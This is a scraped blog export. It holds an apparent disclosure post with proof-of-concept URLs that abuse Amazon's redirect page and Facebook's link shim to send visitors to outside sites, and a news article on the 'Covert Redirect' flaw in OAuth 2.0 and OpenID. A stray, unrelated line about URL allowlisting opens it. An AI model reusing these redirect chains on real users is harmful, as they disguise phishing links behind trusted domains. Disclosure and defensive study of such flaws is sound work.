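Rejecting every embedded off-list URL is deliberately strict and will also block legitimate share links; a narrower alternative is to allowlist exact destination paths instead of whole hosts.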
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(4.2)</b> Use a webpage for the following tests. The webpage address is "<a href="http://www.inzeed.com/kaleidoscope" target="_blank">http://www.inzeed.com/<wbr></wbr>kaleidoscope</a>". Suppose it is malicious.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Vulnerable URL:</b></span></div>
<div>
<a href="http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Famazon%3Fv%3Dapp_165157536856903&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.amazon.com/gp/<wbr></wbr>redirect.html?_encoding=UTF8&<wbr></wbr>location=http%3A%2F%2Fwww.<wbr></wbr>facebook.com%2Famazon%3Fv%<wbr></wbr>3Dapp_165157536856903&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC:</b></span></div>
<div>
<a href="http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.inzeed.com%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.amazon.com/gp/<wbr></wbr>redirect.html?_encoding=UTF8&<wbr></wbr>location=http%3A%2F%2Fwww.<wbr></wbr>facebook.com%2Fl.php%3Fu%<wbr></wbr>3Dhttp%253A%252F%252Fwww.<wbr></wbr>inzeed.com%26h%<wbr></wbr>3D7AQFwCeYDAQEZsz_<wbr></wbr>cx9BJKCE5Af7KKocYw4jOlGk5TB5kZ<wbr></wbr>g&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.amazon.de/gp/redirect.html/ref=cm_sw_cl_fa_dp_1bI9sb0R0MNZH?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.nicovideo.jp%20%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1">http://www.amazon.de/gp/<wbr></wbr>redirect.html/ref=cm_sw_cl_fa_<wbr></wbr>dp_1bI9sb0R0MNZH?_encoding=<wbr></wbr>UTF8&location=http%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>nicovideo.jp%26h%3D7AQFwCeYDAQEZsz_<wbr></wbr>cx9BJKCE5Af7KKocYw4jOlGk5TB5kZ<wbr></wbr>g&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<a href="http://www.amazon.co.uk/gp/redirect.html/ref=cm_sw_cl_fa_dp_Zzbbtb04XETQB?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.bbc.co.uk%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.amazon.co.uk/gp/<wbr></wbr>redirect.html/ref=cm_sw_cl_fa_<wbr></wbr>dp_Zzbbtb04XETQB?_encoding=<wbr></wbr>UTF8&location=http%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>bbc.co.uk%26h%<wbr></wbr>3D7AQFwCeYDAQEZsz_<wbr></wbr>cx9BJKCE5Af7KKocYw4jOlGk5TB5kZ<wbr></wbr>g&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<a href="http://www.amazon.ca/gp/redirect.html/ref=cm_sw_cl_fa_dp_G7uctb099ZX2N?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fgoogleadservices.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.amazon.ca/gp/<wbr></wbr>redirect.html/ref=cm_sw_cl_fa_<wbr></wbr>dp_G7uctb099ZX2N?_encoding=<wbr></wbr>UTF8&location=http%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%<wbr></wbr>252Fgoogleadservices.com%26h%<wbr></wbr>3D_AQHylR65AQG3dZfbwarP74zIO_<wbr></wbr>Gj_ndx4h1QB1r7qbJx4Q&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<a href="https://www.amazon.co.jp/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.pornhub.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.amazon.co.jp/gp/<wbr></wbr>redirect.html/ref=amb_link_<wbr></wbr>64307649_2?location=http%3A%<wbr></wbr>2F%2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>pornhub.com%26h%3D_<wbr></wbr>AQHylR65AQG3dZfbwarP74zIO_Gj_<wbr></wbr>ndx4h1QB1r7qbJx4Q&pf_rd_m=<wbr></wbr>AN1VRQENFRJN5&pf_rd_s=left-2&<wbr></wbr>pf_rd_r=15EZARSP2Q0PG0JW0ZB0&<wbr></wbr>pf_rd_t=101&pf_rd_p=122450949&<wbr></wbr>pf_rd_i=2221688051</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<a href="https://www.amazon.fr/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.naver.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.amazon.fr/gp/<wbr></wbr>redirect.html/ref=amb_link_<wbr></wbr>64307649_2?location=http%3A%<wbr></wbr>2F%2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>naver.com%26h%3D_<wbr></wbr>AQHylR65AQG3dZfbwarP74zIO_Gj_<wbr></wbr>ndx4h1QB1r7qbJx4Q&pf_rd_m=<wbr></wbr>AN1VRQENFRJN5&pf_rd_s=left-2&<wbr></wbr>pf_rd_r=15EZARSP2Q0PG0JW0ZB0&<wbr></wbr>pf_rd_t=101&pf_rd_p=122450949&<wbr></wbr>pf_rd_i=2221688051</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<a href="https://www.amazon.it/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.craigslist.org%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.amazon.it/gp/<wbr></wbr>redirect.html/ref=amb_link_<wbr></wbr>64307649_2?location=http%3A%<wbr></wbr>2F%2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>craigslist.org%26h%3D_<wbr></wbr>AQHylR65AQG3dZfbwarP74zIO_Gj_<wbr></wbr>ndx4h1QB1r7qbJx4Q&pf_rd_m=<wbr></wbr>AN1VRQENFRJN5&pf_rd_s=left-2&<wbr></wbr>pf_rd_r=15EZARSP2Q0PG0JW0ZB0&<wbr></wbr>pf_rd_t=101&pf_rd_p=122450949&<wbr></wbr>pf_rd_i=2221688051</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b></div>
<div>
<div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px;">
<a href="https://www.youtube.com/watch?v=ss3ALnvU63w&feature=youtu.be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=ss3ALnvU63w&feature=youtu.be</span></a></div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px;">
<a href="https://www.youtube.com/watch?v=f4W63YXnbIk"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=f4W63YXnbIk</span></a></div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Blog Details:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.com/2015/01/amazon-covert-redirect-security.html">http://securityrelated.blogspot.com/2015/01/amazon-covert-redirect-security.html</a></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Related Articles:</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2015/Jan/22">http://seclists.org/fulldisclosure/2015/Jan/22</a></span><br />
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1428"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1428</span></a><br />
<a href="http://lists.openwall.net/full-disclosure/2015/01/12/1"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/01/12/1</span></a><br />
<a href="http://marc.info/?l=full-disclosure&m=142104333521454&w=4"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://marc.info/?l=full-disclosure&m=142104333521454&w=4</span></a><br />
<a href="http://diebiyi.com/articles/security/facebook-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/facebook-open-redirect/</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/essaybeans/posts/570476126427191">https://www.facebook.com/essaybeans/posts/570476126427191</a></span><br />
<a href="http://germancast.blogspot.de/2015/06/facebook-web-security-0day-bug.html" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://germancast.blogspot.de/<wbr></wbr>2015/06/facebook-web-security-<wbr></wbr>0day-bug.html</span></a><br />
<a href="https://mathfas.wordpress.com/2015/01/11/facebook-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://mathfas.wordpress.com/2015/01/11/facebook-open-redirect/</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://essaybeans.lofter.com/post/1cc77d20_7300027" target="_blank">http://essaybeans.lofter.com/<wbr></wbr>post/1cc77d20_7300027</a></span><br />
<div>
<a href="http://qianqiuxue.tumblr.com/post/120750458855/itinfotech-facebook-web-security-0day-bug" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://qianqiuxue.tumblr.com/<wbr></wbr>post/120750458855/itinfotech-<wbr></wbr>facebook-web-security-0day-bug</span></a></div>
<a href="https://www.facebook.com/permalink.php?story_fbid=472994806188548&id=405943696226993"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/permalink.php?story_fbid=472994806188548&id=405943696226993</span></a><br />
<a href="http://www.tetraph.com/blog/phishing/facebook-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/blog/phishing/facebook-open-redirect/</span></a></div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://itinfotech.tumblr.com/post/120750347586/facebook-web-security-0day-bug" target="_blank">http://itinfotech.tumblr.com/<wbr></wbr>post/120750347586/facebook-<wbr></wbr>web-security-0day-bug</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ittechnology.lofter.com/post/1cfbf60d_72fd108" target="_blank">http://ittechnology.lofter.<wbr></wbr>com/post/1cfbf60d_72fd108</a></span></div>
<div>
<a href="http://russiapost.blogspot.ru/2015/06/facebook-web-security-0day-bug.html" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://russiapost.blogspot.ru/<wbr></wbr>2015/06/facebook-web-security-<wbr></wbr>0day-bug.html</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://twitter.com/tetraphibious/status/606676645265567744" target="_blank">https://twitter.com/<wbr></wbr>tetraphibious/status/<wbr></wbr>606676645265567744</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://plus.google.com/u/0/110001022997295385049/posts/hb6seddG561" target="_blank">https://plus.google.com/u/0/<wbr></wbr>110001022997295385049/posts/<wbr></wbr>hb6seddG561</a></span></div>
<div>
<a href="http://whitehatpost.blog.163.com/blog/static/24223205420155501020837/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://whitehatpost.blog.163.<wbr></wbr>com/blog/static/<wbr></wbr>24223205420155501020837/</span></a></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.inzeed.com/kaleidoscope/computer-security/facebook-open-redirect/">http://www.inzeed.com/kaleidoscope/computer-security/facebook-open-redirect/</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<br />
<div>
</div>
<br />
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com1tag:blogger.com,1999:blog-827796800660023204.post-23419476944006471742015-06-04T08:08:00.001-07:002015-06-04T08:09:26.624-07:00Internet Users Threatened by New Security Flaw, Covert Redirect<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-EZ8bwtLVgz0/VXBc-bKNj0I/AAAAAAAAA98/q4lTiHTDCc4/s1600/dangerous-fingers-hacking-540x334.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="246" src="http://1.bp.blogspot.com/-EZ8bwtLVgz0/VXBc-bKNj0I/AAAAAAAAA98/q4lTiHTDCc4/s400/dangerous-fingers-hacking-540x334.jpg" width="400" /></a></div>
<br />
A serious flaw in two widely used security standards could give anyone access to your account information at Google, Microsoft, Facebook, Twitter and many other online services. The flaw, dubbed "Covert Redirect" by its discoverer, exists in two open-source session-authorization protocols, OAuth 2.0 and OpenID.<br />
<br />
<br />
Both standards are employed across the Internet to let users log into websites using their credentials from other sites, such as by logging into a Web forum using a Facebook or Twitter username and password instead of creating a new account just for that forum.<br />
<br />
<br />
Attackers could exploit the flaw to disguise and launch phishing attempts from legitimate websites, said the flaw's finder, Mathematics Ph.D. student <a href="http://tetraph.com/wangjing" target="_blank">Wang Jing</a> of the Nanyang Technological University in Singapore.<br />
<br />
<br />
Wang believes it's unlikely that this flaw will be patched any time soon. He says neither the authentication companies (those with which users have an account, such as Google, Microsoft, Facebook, Twitter or LinkedIn, among others) nor the client companies (sites or apps whose users log in via an account from an authentication company) are taking responsibility for fixing the issue.<br />
<br />
<br />
"The vulnerability is usually due to the existing weakness in the third-party websites," Wang <a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html" target="_blank">writes on his own blog</a>. "However, they have little incentive to fix the problem."<br />
<br />
<br />
The biggest danger of Covert Redirect is that it could be used to conduct <a href="http://tetraph.com/covert_redirect" target="_blank">phishing</a> attacks, in which cybercriminals seize login credentials, by using email messages containing links to malicious websites disguised as something their targets might want to visit.<br />
<br />
<br />
Normal phishing attempts can be easy to spot, because the malicious page's URL will usually be off by a couple of letters from that of the real site. The difference with Covert Redirect is that an attacker could use the real website instead by corrupting the site with a malicious login popup dialogue box.<br />
<br />
<br />
For example, say you regularly visit a given forum (the client company), to which you log in using your credentials from Facebook (the authentication company). Facebook uses OAuth 2.0 to authenticate logins, so an attacker could put a corrupted Facebook login popup box on this forum.<br />
<br />
<br />
If you sign in using that popup box, your Facebook data will be released to the attacker, not to the forum. This means the attacker could possibly gain access to your Facebook account, which he or she could use to <a href="http://www.tomsguide.com/us/scariest-security-threats,review-2144-2.html">spread</a> more socially engineered attacks to your Facebook friends.<br />
<br />
<br />
Covert Redirect could also be used in redirection attacks, which is when a link takes you to a different page than the one expected.<br />
<br />
<br />
Wang told <a href="http://www.cnet.com/news/serious-security-flaw-in-oauth-and-openid-discovered/">CNET</a> authentication companies should create whitelists — pre-approved lists that block any not on it — of the client companies that are allowed to use OAuth and OpenID to redirect to them. But he said he had contacted a number of these authentication companies, who all shifted blame elsewhere.<br />
<br />
<br />
Wang told CNET Facebook had told him it "understood the risks associated with OAuth 2.0" but that fixing the flaw would be "something that can't be accomplished in the short term." Google and LinkedIn allegedly told Wang they were looking into the issue, while Microsoft said the issue did not exist on its own sites.<br />
<br />
<br />
Covert Redirect appears to exist in the implementations of the OpenID and OAuth standards used on client websites and apps. But because these two standards are open-source and were developed by a group of volunteers, there's no company or dedicated team that could devote itself to fixing the issue.<br />
<br />
<br />
<br />
<br />
<br />
<b>Where does that leave things? </b><br />
"Given the trust users put in Facebook and other major OAuth providers, I think it will be easy for attackers to trick people into giving some access to their personal information stored on those services," Chris Wysopal, chief technology officer of Boston-area security firm Veracode and a member of the legendary 1990s hackerspace the L0pht, told CNET.<br />
<br />
<br />
"It's not easy to fix, and any effective remedies would negatively impact the user experience," Jeremiah Grossman, founder of Santa Clara, Calif.-based WhiteHat Security, told CNET. "Just another example that Web security is fundamentally broken and the powers that be have little incentive to address the inherent flaws."<br />
<br />
<br />
Users should be extra-wary of login popups on Web pages. If you wish to log into a given website, it might be better to use an account specific to that website instead of logging in with Facebook, Twitter, or another authentication company, which would require the use of OAuth and/or OpenID to do.<br />
<br />
<br />
If you think someone has gained access to one of your online accounts, notify the service and change that account's password immediately.<br />
<br />essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0